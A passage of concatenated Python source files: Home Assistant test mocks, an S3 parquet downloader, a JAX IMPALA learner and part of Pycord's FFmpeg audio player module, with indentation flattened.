"""Mock the Device Registry."""
registry = device_registry.DeviceRegistry(hass)
registry.devices = mock_entries or OrderedDict()
async def _get_reg():
return registry
hass.data[device_registry.DATA_REGISTRY] = \
hass.loop.create_task(_get_reg())
return registry
class MockUser(auth_models.User):
"""Mock a user in Home Assistant."""
def __init__(self, id=None, is_owner=False, is_active=True,
name='Mock User', system_generated=False):
"""Initialize mock user."""
kwargs = {
'is_owner': is_owner,
'is_active': is_active,
'name': name,
'system_generated': system_generated,
}
if id is not None:
kwargs['id'] = id
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
return self.add_to_auth_manager(hass.auth)
def add_to_auth_manager(self, auth_mgr):
"""Test helper to add entry to hass."""
ensure_auth_manager_loaded(auth_mgr)
auth_mgr._store._users[self.id] = self
return self
async def register_auth_provider(hass, config):
"""Register an auth provider."""
provider = await auth_providers.auth_provider_from_config(
hass, hass.auth._store, config)
assert provider is not None, 'Invalid config specified'
key = (provider.type, provider.id)
providers = hass.auth._providers
if key in providers:
raise ValueError('Provider already registered')
providers[key] = provider
return provider
@ha.callback
def ensure_auth_manager_loaded(auth_mgr):
"""Ensure an auth manager is considered loaded."""
store = auth_mgr._store
if store._users is None:
store._users = OrderedDict()
class MockModule:
"""Representation of a fake module."""
# pylint: disable=invalid-name
def __init__(self, domain=None, dependencies=None, setup=None,
requirements=None, config_schema=None, platform_schema=None,
async_setup=None, async_setup_entry=None,
async_unload_entry=None):
"""Initialize the mock module."""
self.DOMAIN = domain
self.DEPENDENCIES = dependencies or []
self.REQUIREMENTS = requirements or []
if config_schema is not None:
self.CONFIG_SCHEMA = config_schema
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if setup is not None:
# We run this in executor, wrap it in function
self.setup = lambda *args: setup(*args)
if async_setup is not None:
self.async_setup = async_setup
if setup is None and async_setup is None:
self.async_setup = mock_coro_func(True)
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if async_unload_entry is not None:
self.async_unload_entry = async_unload_entry
class MockPlatform:
"""Provide a fake platform."""
# pylint: disable=invalid-name
def __init__(self, setup_platform=None, dependencies=None,
platform_schema=None, async_setup_platform=None,
async_setup_entry=None, scan_interval=None):
"""Initialize the platform."""
self.DEPENDENCIES = dependencies or []
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if scan_interval is not None:
self.SCAN_INTERVAL = scan_interval
if setup_platform is not None:
# We run this in executor, wrap it in function
self.setup_platform = lambda *args: setup_platform(*args)
if async_setup_platform is not None:
self.async_setup_platform = async_setup_platform
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if setup_platform is None and async_setup_platform is None:
self.async_setup_platform = mock_coro_func()
class MockEntityPlatform(entity_platform.EntityPlatform):
"""Mock class with some mock defaults."""
def __init__(
self, hass,
logger=None,
domain='test_domain',
platform_name='test_platform',
platform=None,
scan_interval=timedelta(seconds=15),
entity_namespace=None,
async_entities_added_callback=lambda: None
):
"""Initialize a mock entity platform."""
if logger is None:
logger = logging.getLogger('homeassistant.helpers.entity_platform')
# Otherwise the constructor will blow up.
if (isinstance(platform, Mock) and
isinstance(platform.PARALLEL_UPDATES, Mock)):
platform.PARALLEL_UPDATES = 0
super().__init__(
hass=hass,
logger=logger,
domain=domain,
platform_name=platform_name,
platform=platform,
scan_interval=scan_interval,
entity_namespace=entity_namespace,
async_entities_added_callback=async_entities_added_callback,
)
class MockToggleDevice(entity.ToggleEntity):
"""Provide a mock toggle device."""
def __init__(self, name, state):
"""Initialize the mock device."""
self._name = name or DEVICE_DEFAULT_NAME
self._state = state
self.calls = []
@property
def name(self):
"""Return the name of the device if any."""
self.calls.append(('name', {}))
return self._name
@property
def state(self):
"""Return the name of the device if any."""
self.calls.append(('state', {}))
return self._state
@property
def is_on(self):
"""Return true if device is on."""
self.calls.append(('is_on', {}))
return self._state == STATE_ON
def turn_on(self, **kwargs):
"""Turn the device on."""
self.calls.append(('turn_on', kwargs))
self._state = STATE_ON
def turn_off(self, **kwargs):
"""Turn the device off."""
self.calls.append(('turn_off', kwargs))
self._state = STATE_OFF
def last_call(self, method=None):
"""Return the last call."""
if not self.calls:
return None
if method is None:
return self.calls[-1]
try:
return next(call for call in reversed(self.calls)
if call[0] == method)
except StopIteration:
return None
class MockConfigEntry(config_entries.ConfigEntry):
"""Helper for creating config entries that adds some defaults."""
def __init__(self, *, domain='test', data=None, version=0, entry_id=None,
source=config_entries.SOURCE_USER, title='Mock Title',
state=None,
connection_class=config_entries.CONN_CLASS_UNKNOWN):
"""Initialize a mock config entry."""
kwargs = {
'entry_id': entry_id or 'mock-id',
'domain': domain,
'data': data or {},
'version': version,
'title': title,
'connection_class': connection_class,
}
if source is not None:
kwargs['source'] = source
if state is not None:
kwargs['state'] = state
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
hass.config_entries._entries.append(self)
def add_to_manager(self, manager):
"""Test helper to add entry to entry manager."""
manager._entries.append(self)
def patch_yaml_files(files_dict, endswith=True):
"""Patch load_yaml with a dictionary of yaml files."""
# match using endswith, start search with longest string
matchlist = sorted(list(files_dict.keys()), key=len) if endswith else []
def mock_open_f(fname, **_):
"""Mock open() in the yaml module, used by load_yaml."""
# Return the mocked file on full match
if fname in files_dict:
_LOGGER.debug("patch_yaml_files match %s", fname)
res = StringIO(files_dict[fname])
setattr(res, 'name', fname)
return res
# Match using endswith
for ends in matchlist:
if fname.endswith(ends):
_LOGGER.debug("patch_yaml_files end match %s: %s", ends, fname)
res = StringIO(files_dict[ends])
setattr(res, 'name', fname)
return res
# Fallback for hass.components (i.e. services.yaml)
if 'homeassistant/components' in fname:
_LOGGER.debug("patch_yaml_files using real file: %s", fname)
return open(fname, encoding='utf-8')
# Not found
raise FileNotFoundError("File not found: {}".format(fname))
return patch.object(yaml, 'open', mock_open_f, create=True)
def mock_coro(return_value=None, exception=None):
"""Return a coro that returns a value or raise an exception."""
return mock_coro_func(return_value, exception)()
def mock_coro_func(return_value=None, exception=None):
"""Return a method to create a coro function that returns a value."""
@asyncio.coroutine
def coro(*args, **kwargs):
"""Fake coroutine."""
if exception:
raise exception
return return_value
return coro
@contextmanager
def assert_setup_component(count, domain=None):
"""Collect valid configuration from setup_component.
    - count: The number of valid platforms that should be set up
    - domain: The domain to count. It is optional and can be automatically
      determined most of the time.
Use as a context manager around setup.setup_component
with assert_setup_component(0) as result_config:
setup_component(hass, domain, start_config)
# using result_config is optional
"""
config = {}
@ha.callback
def mock_psc(hass, config_input, domain):
"""Mock the prepare_setup_component to capture config."""
res = async_process_component_config(
hass, config_input, domain)
config[domain] = None if res is None else res.get(domain)
_LOGGER.debug("Configuration for %s, Validated: %s, Original %s",
domain, config[domain], config_input.get(domain))
return res
assert isinstance(config, dict)
with patch('homeassistant.config.async_process_component_config',
mock_psc):
yield config
if domain is None:
assert len(config) == 1, ('assert_setup_component requires DOMAIN: {}'
.format(list(config.keys())))
domain = list(config.keys())[0]
res = config.get(domain)
res_len = 0 if res is None else len(res)
assert res_len == count, 'setup_component failed, expected {} got {}: {}' \
.format(count, res_len, res)
def init_recorder_component(hass, add_config=None):
"""Initialize the recorder."""
config = dict(add_config) if add_config else {}
config[recorder.CONF_DB_URL] = 'sqlite://' # In memory DB
with patch('homeassistant.components.recorder.migration.migrate_schema'):
assert setup_component(hass, recorder.DOMAIN,
{recorder.DOMAIN: config})
assert recorder.DOMAIN in hass.config.components
_LOGGER.info("In-memory recorder successfully started")
def mock_restore_cache(hass, states):
"""Mock the DATA_RESTORE_CACHE."""
key = restore_state.DATA_RESTORE_CACHE
hass.data[key] = {
state.entity_id: state for state in states}
_LOGGER.debug('Restore cache: %s', hass.data[key])
assert len(hass.data[key]) == len(states), \
"Duplicate entity_id? {}".format(states)
hass.state = ha.CoreState.starting
mock_component(hass, recorder.DOMAIN)
class MockDependency:
"""Decorator to mock install a dependency."""
def __init__(self, root, *args):
"""Initialize decorator."""
self.root = root
self.submodules = args
def __enter__(self):
"""Start mocking."""
def resolve(mock, path):
"""Resolve a mock."""
if not path:
return mock
return resolve(getattr(mock, path[0]), path[1:])
base = MagicMock()
to_mock = {
"{}.{}".format(self.root, tom): resolve(base, tom.split('.'))
for tom in self.submodules
}
to_mock[self.root] = base
self.patcher = patch.dict('sys.modules', to_mock)
self.patcher.start()
return base
def __exit__(self, *exc):
"""Stop mocking."""
self.patcher.stop()
return False
def __call__(self, func):
"""Apply decorator."""
def run_mocked(*args, **kwargs):
"""Run with mocked dependencies."""
with self as base:
args = list(args) + [base]
func(*args, **kwargs)
return run_mocked
class MockEntity(entity.Entity):
"""Mock Entity class."""
def __init__(self, **values):
"""Initialize an entity."""
self._values = values
if 'entity_id' in values:
self.entity_id = values['entity_id']
@property
def name(self):
"""Return the name of the entity."""
return self._handle('name')
@property
def should_poll(self):
"""Return the ste of the polling."""
return self._handle('should_poll')
@property
def unique_id(self):
"""Return the unique ID of the entity."""
return self._handle('unique_id')
@property
def available(self):
"""Return True if entity is available."""
return self._handle('available')
@property
def device_info(self):
"""Info how it links to a device."""
return self._handle('device_info')
def _handle(self, attr):
"""Return attribute value."""
if attr in self._values:
return self._values[attr]
return getattr(super(), attr)
@contextmanager
def mock_storage(data=None):
"""Mock storage.
Data is a dict {'key': {'version': version, 'data': data}}
Written data will be converted to JSON to ensure JSON parsing works.
"""
if data is None:
data = {}
orig_load = storage.Store._async_load
async def mock_async_load(store):
"""Mock version of load."""
if store._data is None:
# No data to load
if store.key not in data:
return None
mock_data = data.get(store.key)
if 'data' not in mock_data or 'version' not in mock_data:
_LOGGER.error('Mock data needs "version" and "data"')
raise ValueError('Mock data needs "version" and "data"')
store._data = mock_data
# Route through original load so that we trigger migration
loaded = await orig_load(store)
_LOGGER.info('Loading data for %s: %s', store.key, loaded)
return loaded
def mock_write_data(store, path, data_to_write):
"""Mock version of write data."""
# To ensure that the data can be serialized
_LOGGER.info('Writing data to %s: %s', store.key, data_to_write)
data[store.key] = json.loads(json.dumps(data_to_write))
with patch('homeassistant.helpers.storage.Store._async_load',
side_effect=mock_async_load, autospec=True), \
patch('homeassistant.helpers.storage.Store._write_data',
side_effect=mock_write_data, autospec=True):
yield data
async def flush_store(store):
"""Make sure all delayed writes of a store are written."""
if store._data is None:
return
await store._async_handle_write_data()
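# ---------------------------------------------------------------------------
# Usage sketch (illustrative only, not part of the helpers): a minimal
# synchronous test built from the helpers above. The component name and device
# name are hypothetical placeholders.
#
#   def test_toggle_device_turns_on():
#       hass = get_test_home_assistant()
#       try:
#           mock_component(hass, 'demo')
#           device = MockToggleDevice('lamp', STATE_OFF)
#           device.turn_on()
#           assert device.is_on
#           assert device.last_call('turn_on') is not None
#       finally:
#           hass.stop()
# ---------------------------------------------------------------------------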
|
download.py
|
#!/usr/local/bin/python3
# encoding: utf-8
"""
download.py
Created by Zach Schumacher on 2019-08-14.
Modified by Patrick Shaner on 2019-08-14.
Copyright (c) 2019 Patrick Shaner
Downloads data files from S3 file to local storage
Version 2019-08-14
Initial file creation
Version 2019-08-14
Updated to write to a temp directory
"""
import os
import s3fs
from multiprocessing import Process, Queue, cpu_count
from urllib3.connection import NewConnectionError
class DownloadError(Exception):
pass
class ParquetFromS3:
"""
Downloads all the elements in a parquet directory using multiprocessing.
    :param connection: s3fs connection to S3 storage
:param parent_dir: directory created to store all elements
:param uri: S3 path to download
:: How to run::
        Initialize the class with an s3fs connection, the directory you want to save the
        parquet directory to, and the S3 parquet path to download.
        Call download_files_from_s3(), then check the successfully_downloaded property: it returns True if all
        files now exist on local storage (successfully downloaded) or False if not. A usage sketch follows the class.
"""
_connection = None # Connection to S3 leveraging S3FS
_destination_path = None # Directory to write files to as downloads
_uri = None # S3 Bucket to download from
_queue = None # Threading Queue
_num_of_processes = None # Number of process for Queue
_files_to_download = None # List of all files to download from S3
def __init__(self, connection: s3fs, parent_dir: str, uri: str) -> None:
"""
Downloads all the elements in a parquet directory using multiprocessing.
        :param connection: s3fs connection to S3 storage
:param parent_dir: directory created to store all elements
:param uri: S3 path to download
"""
self._files_to_download = list()
self._num_of_processes = cpu_count()
self._queue = Queue()
self._uri = uri
self._set_connection_to_s3(connection)
self._set_destination_directory(parent_dir)
self._create_list_of_files_to_download()
@property
def destination_path(self):
return self._destination_path
@property
def successfully_downloaded(self) -> bool:
"""
        Validates that all files expected to be downloaded actually exist (non-empty) on local disk
:return: bool
"""
found_all_results = True
for file_name in self._files_to_download:
final_path = os.path.join(self.destination_path, file_name)
if not os.path.exists(final_path):
found_all_results = False
break
if os.path.getsize(final_path) <= 1:
found_all_results = False
break
return found_all_results
def download_files_from_s3(self) -> None:
"""
        Downloads all queued files from S3 to local disk using multiple worker processes
:return: None
"""
processes = []
for i in range(self._num_of_processes):
p = Process(target=self._download_single_file, args=(self._queue,))
processes.append(p)
p.start()
for process in processes:
process.join()
def _create_list_of_files_to_download(self) -> None:
"""
Iterates over the S3 path creating a list of all files that do not start with '_'
:return: None
"""
for file_name in self._connection.ls(f's3://{self._uri}'):
if not os.path.basename(file_name).startswith('_'):
self._queue.put(file_name)
_, name_part = os.path.split(file_name)
self._files_to_download.append(name_part)
def _set_connection_to_s3(self, connection: s3fs) -> None:
"""
        Validates the connection is the correct type and not None; if None, creates a new connection using env variables
:param connection: Connection object created from env variables by caller
:return: None
"""
if connection:
self._connection = connection
else:
key = os.getenv("S3_ACCESS", None)
secret = os.getenv("S3_SECRET", None)
if key and secret:
self._connection = s3fs.S3FileSystem(key=key, secret=secret)
else:
raise DownloadError("Unable to make connection to S3 because required "
"environment variables are not set")
def _set_destination_directory(self, parent_dir: str) -> None:
"""
Creates a destination directory within the parent directory
:param parent_dir: string file path
:return: None
"""
if not parent_dir:
raise DownloadError("Destination directory is not set")
else:
_, file_name = os.path.split(self._uri)
self._destination_path = os.path.join(parent_dir, f"{file_name}")
if not os.path.exists(self._destination_path):
os.mkdir(self._destination_path)
def _download_single_file(self, queue):
try:
while not queue.empty():
path = queue.get()
filename = os.path.basename(path)
_target_path = os.path.join(self._destination_path, filename)
with self._connection.open(path, 'rb') as remote_file, open(_target_path, 'wb') as local_file:
local_file.write(remote_file.read())
except NewConnectionError as con:
raise DownloadError(f"Failed to complete downloading because {con}")
|
learner.py
|
# Copyright 2020 DeepMind Technologies Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""IMPALA learner class."""
import functools
import itertools
import queue
import threading
from typing import Dict, Tuple
import warnings
import dm_env
import haiku as hk
from examples.impala import agent as agent_lib
from examples.impala import util
import jax
from jax.experimental import optimizers
import jax.numpy as jnp
import numpy as np
import optax
import rlax
# The IMPALA paper sums losses, rather than taking the mean.
# We wrap rlax to do so as well.
def policy_gradient_loss(logits, *args):
"""rlax.policy_gradient_loss, but with sum(loss) and [T, B, ...] inputs."""
mean_per_batch = jax.vmap(rlax.policy_gradient_loss, in_axes=1)(logits, *args)
total_loss_per_batch = mean_per_batch * logits.shape[0]
return jnp.sum(total_loss_per_batch)
def entropy_loss(logits, *args):
"""rlax.entropy_loss, but with sum(loss) and [T, B, ...] inputs."""
mean_per_batch = jax.vmap(rlax.entropy_loss, in_axes=1)(logits, *args)
total_loss_per_batch = mean_per_batch * logits.shape[0]
return jnp.sum(total_loss_per_batch)
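# Illustrative sketch (not part of the original module) of the scaling performed
# by the wrappers above: rlax returns a per-batch-entry mean over time, and the
# wrapper multiplies the time dimension back in and sums over the batch.
# The shapes below (T=4, B=2, 3 actions) are hypothetical.
def _loss_scaling_sketch():
    logits = jnp.zeros((4, 2, 3))
    mask = jnp.ones((4, 2))
    per_batch_mean = jax.vmap(rlax.entropy_loss, in_axes=1)(logits, mask)  # shape [B]
    assert jnp.allclose(entropy_loss(logits, mask), jnp.sum(per_batch_mean * 4))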
class Learner:
"""Manages state and performs updates for IMPALA learner."""
def __init__(
self,
agent: agent_lib.Agent,
rng_key,
opt: optax.GradientTransformation,
batch_size: int,
discount_factor: float,
frames_per_iter: int,
max_abs_reward: float = 0,
logger=None,
):
if jax.device_count() > 1:
warnings.warn('Note: the impala example will only take advantage of a '
'single accelerator.')
self._agent = agent
self._opt = opt
self._batch_size = batch_size
self._discount_factor = discount_factor
self._frames_per_iter = frames_per_iter
self._max_abs_reward = max_abs_reward
# Data pipeline objects.
self._done = False
self._host_q = queue.Queue(maxsize=self._batch_size)
self._device_q = queue.Queue(maxsize=1)
# Prepare the parameters to be served to actors.
params = agent.initial_params(rng_key)
self._params_for_actor = (0, jax.device_get(params))
# Set up logging.
if logger is None:
logger = util.NullLogger()
self._logger = logger
def _loss(
self,
theta: hk.Params,
trajectories: util.Transition,
) -> Tuple[jnp.ndarray, Dict[str, jnp.ndarray]]:
"""Compute vtrace-based actor-critic loss."""
initial_state = jax.tree_map(lambda t: t[0], trajectories.agent_state)
learner_outputs = self._agent.unroll(theta, trajectories.timestep,
initial_state)
v_t = learner_outputs.values[1:]
# Remove bootstrap timestep from non-timesteps.
_, actor_out, _ = jax.tree_map(lambda t: t[:-1], trajectories)
learner_outputs = jax.tree_map(lambda t: t[:-1], learner_outputs)
v_tm1 = learner_outputs.values
# Get the discount, reward, step_type from the *next* timestep.
timestep = jax.tree_map(lambda t: t[1:], trajectories.timestep)
discounts = timestep.discount * self._discount_factor
rewards = timestep.reward
if self._max_abs_reward > 0:
rewards = jnp.clip(rewards, -self._max_abs_reward, self._max_abs_reward)
# The step is uninteresting if we transitioned LAST -> FIRST.
# timestep corresponds to the *next* time step, so we filter for FIRST.
mask = jnp.not_equal(timestep.step_type, int(dm_env.StepType.FIRST))
mask = mask.astype(jnp.float32)
rhos = rlax.categorical_importance_sampling_ratios(
learner_outputs.policy_logits, actor_out.policy_logits,
actor_out.action)
# vmap vtrace_td_error_and_advantage to take/return [T, B, ...].
vtrace_td_error_and_advantage = jax.vmap(
rlax.vtrace_td_error_and_advantage, in_axes=1, out_axes=1)
vtrace_returns = vtrace_td_error_and_advantage(
v_tm1, v_t, rewards, discounts, rhos)
pg_advs = vtrace_returns.pg_advantage
pg_loss = policy_gradient_loss(learner_outputs.policy_logits,
actor_out.action, pg_advs, mask)
baseline_loss = 0.5 * jnp.sum(jnp.square(vtrace_returns.errors) * mask)
ent_loss = entropy_loss(learner_outputs.policy_logits, mask)
total_loss = pg_loss
total_loss += 0.5 * baseline_loss
total_loss += 0.01 * ent_loss
logs = {}
logs['PG_loss'] = pg_loss
logs['baseline_loss'] = baseline_loss
logs['entropy_loss'] = ent_loss
logs['total_loss'] = total_loss
return total_loss, logs
@functools.partial(jax.jit, static_argnums=0)
def update(self, params, opt_state, batch: util.Transition):
"""The actual update function."""
(_, logs), grads = jax.value_and_grad(
self._loss, has_aux=True)(params, batch)
grad_norm_unclipped = optimizers.l2_norm(grads)
updates, updated_opt_state = self._opt.update(grads, opt_state)
params = optax.apply_updates(params, updates)
weight_norm = optimizers.l2_norm(params)
logs.update({
'grad_norm_unclipped': grad_norm_unclipped,
'weight_norm': weight_norm,
})
return params, updated_opt_state, logs
def enqueue_traj(self, traj: util.Transition):
"""Enqueue trajectory."""
self._host_q.put(traj)
def params_for_actor(self) -> Tuple[int, hk.Params]:
return self._params_for_actor
def host_to_device_worker(self):
"""Elementary data pipeline."""
batch = []
while not self._done:
# Try to get a batch. Skip the iteration if we couldn't.
try:
for _ in range(len(batch), self._batch_size):
# As long as possible while keeping learner_test time reasonable.
batch.append(self._host_q.get(timeout=10))
except queue.Empty:
continue
assert len(batch) == self._batch_size
# Prepare for consumption, then put batch onto device.
stacked_batch = jax.tree_multimap(lambda *xs: np.stack(xs, axis=1),
*batch)
self._device_q.put(jax.device_put(stacked_batch))
# Clean out the built-up batch.
batch = []
def run(self, max_iterations: int = -1):
"""Runs the learner for max_iterations updates."""
# Start host-to-device transfer worker.
transfer_thread = threading.Thread(target=self.host_to_device_worker)
transfer_thread.start()
(num_frames, params) = self._params_for_actor
opt_state = self._opt.init(params)
steps = range(max_iterations) if max_iterations != -1 else itertools.count()
for _ in steps:
batch = self._device_q.get()
params, opt_state, logs = self.update(params, opt_state, batch)
num_frames += self._frames_per_iter
# Collect parameters to distribute to downstream actors.
self._params_for_actor = (num_frames, jax.device_get(params))
# Collect and write logs out.
logs = jax.device_get(logs)
logs.update({
'num_frames': num_frames,
})
self._logger.write(logs)
# Shut down.
self._done = True
self._logger.close()
transfer_thread.join()
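# Illustrative sketch (not part of the original module) of the batching
# convention used by host_to_device_worker: each actor enqueues a time-major
# trajectory of shape [T, ...], and the worker stacks B of them along a new
# axis 1 to produce the [T, B, ...] layout expected by _loss. The arrays below
# are hypothetical placeholders for util.Transition leaves.
def _stacking_convention_sketch():
    per_actor = [np.zeros((5, 4)) for _ in range(3)]  # three [T=5, feature=4] trajectories
    stacked = jax.tree_multimap(lambda *xs: np.stack(xs, axis=1), *per_actor)
    assert stacked.shape == (5, 3, 4)  # [T, B, feature]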
|
player.py
|
"""
The MIT License (MIT)
Copyright (c) 2015-2021 Rapptz
Copyright (c) 2021-present Pycord Development
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
from __future__ import annotations
import asyncio
import audioop
import io
import json
import logging
import re
import shlex
import subprocess
import sys
import threading
import time
import traceback
from typing import (
IO,
TYPE_CHECKING,
Any,
Callable,
Generic,
Optional,
Tuple,
Type,
TypeVar,
Union,
)
from .errors import ClientException
from .oggparse import OggStream
from .opus import Encoder as OpusEncoder
from .utils import MISSING
if TYPE_CHECKING:
from .voice_client import VoiceClient
AT = TypeVar("AT", bound="AudioSource")
FT = TypeVar("FT", bound="FFmpegOpusAudio")
_log = logging.getLogger(__name__)
__all__ = (
"AudioSource",
"PCMAudio",
"FFmpegAudio",
"FFmpegPCMAudio",
"FFmpegOpusAudio",
"PCMVolumeTransformer",
)
CREATE_NO_WINDOW: int
if sys.platform != "win32":
CREATE_NO_WINDOW = 0
else:
CREATE_NO_WINDOW = 0x08000000
class AudioSource:
"""Represents an audio stream.
The audio stream can be Opus encoded or not, however if the audio stream
is not Opus encoded then the audio format must be 16-bit 48KHz stereo PCM.
.. warning::
The audio source reads are done in a separate thread.
"""
def read(self) -> bytes:
"""Reads 20ms worth of audio.
Subclasses must implement this.
        If the audio is complete, then return an empty
        :term:`py:bytes-like object` to signal this.
If :meth:`~AudioSource.is_opus` method returns ``True``, then it must return
20ms worth of Opus encoded audio. Otherwise, it must be 20ms
worth of 16-bit 48KHz stereo PCM, which is about 3,840 bytes
per frame (20ms worth of audio).
Returns
--------
:class:`bytes`
A bytes like object that represents the PCM or Opus data.
"""
raise NotImplementedError
def is_opus(self) -> bool:
"""Checks if the audio source is already encoded in Opus."""
return False
def cleanup(self) -> None:
"""Called when clean-up is needed to be done.
Useful for clearing buffer data or processes after
it is done playing audio.
"""
pass
def __del__(self) -> None:
self.cleanup()
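# Illustrative sketch (not part of the original module): a minimal custom
# AudioSource that yields a fixed duration of 16-bit 48KHz stereo silence,
# following the 20ms-per-read() contract described above.
class _SilenceSource(AudioSource):
    def __init__(self, seconds: float) -> None:
        self._frames_left = int(seconds * 1000 / 20)  # one frame per 20ms
    def read(self) -> bytes:
        if self._frames_left <= 0:
            return b""  # empty bytes signals that the stream has ended
        self._frames_left -= 1
        return b"\x00" * OpusEncoder.FRAME_SIZE  # one 20ms frame of PCM silence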
class PCMAudio(AudioSource):
"""Represents raw 16-bit 48KHz stereo PCM audio source.
Attributes
-----------
stream: :term:`py:file object`
A file-like object that reads byte data representing raw PCM.
"""
def __init__(self, stream: io.BufferedIOBase) -> None:
self.stream: io.BufferedIOBase = stream
def read(self) -> bytes:
ret = self.stream.read(OpusEncoder.FRAME_SIZE)
if len(ret) != OpusEncoder.FRAME_SIZE:
return b""
return ret
class FFmpegAudio(AudioSource):
"""Represents an FFmpeg (or AVConv) based AudioSource.
    User-created AudioSources that use FFmpeg differently from how :class:`FFmpegPCMAudio` and
    :class:`FFmpegOpusAudio` work should subclass this.
.. versionadded:: 1.3
"""
def __init__(
self,
source: Union[str, io.BufferedIOBase],
*,
executable: str = "ffmpeg",
args: Any,
**subprocess_kwargs: Any,
):
piping = subprocess_kwargs.get("stdin") == subprocess.PIPE
if piping and isinstance(source, str):
raise TypeError("parameter conflict: 'source' parameter cannot be a string when piping to stdin")
args = [executable, *args]
kwargs = {"stdout": subprocess.PIPE}
kwargs.update(subprocess_kwargs)
self._process: subprocess.Popen = self._spawn_process(args, **kwargs)
self._stdout: IO[bytes] = self._process.stdout # type: ignore
self._stdin: Optional[IO[bytes]] = None
self._pipe_thread: Optional[threading.Thread] = None
if piping:
n = f"popen-stdin-writer:{id(self):#x}"
self._stdin = self._process.stdin
self._pipe_thread = threading.Thread(target=self._pipe_writer, args=(source,), daemon=True, name=n)
self._pipe_thread.start()
def _spawn_process(self, args: Any, **subprocess_kwargs: Any) -> subprocess.Popen:
process = None
try:
process = subprocess.Popen(args, creationflags=CREATE_NO_WINDOW, **subprocess_kwargs)
except FileNotFoundError:
executable = args.partition(" ")[0] if isinstance(args, str) else args[0]
raise ClientException(f"{executable} was not found.") from None
except subprocess.SubprocessError as exc:
raise ClientException(f"Popen failed: {exc.__class__.__name__}: {exc}") from exc
else:
return process
def _kill_process(self) -> None:
proc = self._process
if proc is MISSING:
return
_log.info("Preparing to terminate ffmpeg process %s.", proc.pid)
try:
proc.kill()
except Exception:
_log.exception("Ignoring error attempting to kill ffmpeg process %s", proc.pid)
if proc.poll() is None:
_log.info(
"ffmpeg process %s has not terminated. Waiting to terminate...",
proc.pid,
)
proc.communicate()
_log.info(
"ffmpeg process %s should have terminated with a return code of %s.",
proc.pid,
proc.returncode,
)
else:
_log.info(
"ffmpeg process %s successfully terminated with return code of %s.",
proc.pid,
proc.returncode,
)
def _pipe_writer(self, source: io.BufferedIOBase) -> None:
while self._process:
# arbitrarily large read size
data = source.read(8192)
if not data:
self._process.terminate()
return
try:
self._stdin.write(data)
except Exception:
_log.debug(
"Write error for %s, this is probably not a problem",
self,
exc_info=True,
)
# at this point the source data is either exhausted or the process is fubar
self._process.terminate()
return
def cleanup(self) -> None:
self._kill_process()
self._process = self._stdout = self._stdin = MISSING
class FFmpegPCMAudio(FFmpegAudio):
"""An audio source from FFmpeg (or AVConv).
This launches a sub-process to a specific input file given.
.. warning::
You must have the ffmpeg or avconv executable in your path environment
variable in order for this to work.
Parameters
------------
source: Union[:class:`str`, :class:`io.BufferedIOBase`]
The input that ffmpeg will take and convert to PCM bytes.
If ``pipe`` is ``True`` then this is a file-like object that is
passed to the stdin of ffmpeg.
executable: :class:`str`
The executable name (and path) to use. Defaults to ``ffmpeg``.
pipe: :class:`bool`
If ``True``, denotes that ``source`` parameter will be passed
to the stdin of ffmpeg. Defaults to ``False``.
stderr: Optional[:term:`py:file object`]
A file-like object to pass to the Popen constructor.
Could also be an instance of ``subprocess.PIPE``.
before_options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg before the ``-i`` flag.
options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg after the ``-i`` flag.
Raises
--------
ClientException
The subprocess failed to be created.
"""
def __init__(
self,
source: Union[str, io.BufferedIOBase],
*,
executable: str = "ffmpeg",
pipe: bool = False,
stderr: Optional[IO[str]] = None,
before_options: Optional[str] = None,
options: Optional[str] = None,
) -> None:
args = []
subprocess_kwargs = {
"stdin": subprocess.PIPE if pipe else subprocess.DEVNULL,
"stderr": stderr,
}
if isinstance(before_options, str):
args.extend(shlex.split(before_options))
args.append("-i")
args.append("-" if pipe else source)
args.extend(("-f", "s16le", "-ar", "48000", "-ac", "2", "-loglevel", "warning"))
if isinstance(options, str):
args.extend(shlex.split(options))
args.append("pipe:1")
super().__init__(source, executable=executable, args=args, **subprocess_kwargs)
def read(self) -> bytes:
ret = self._stdout.read(OpusEncoder.FRAME_SIZE)
if len(ret) != OpusEncoder.FRAME_SIZE:
return b""
return ret
def is_opus(self) -> bool:
return False
class FFmpegOpusAudio(FFmpegAudio):
"""An audio source from FFmpeg (or AVConv).
This launches a sub-process to a specific input file given. However, rather than
producing PCM packets like :class:`FFmpegPCMAudio` does that need to be encoded to
Opus, this class produces Opus packets, skipping the encoding step done by the library.
Alternatively, instead of instantiating this class directly, you can use
:meth:`FFmpegOpusAudio.from_probe` to probe for bitrate and codec information. This
can be used to opportunistically skip pointless re-encoding of existing Opus audio data
for a boost in performance at the cost of a short initial delay to gather the information.
The same can be achieved by passing ``copy`` to the ``codec`` parameter, but only if you
know that the input source is Opus encoded beforehand.
.. versionadded:: 1.3
.. warning::
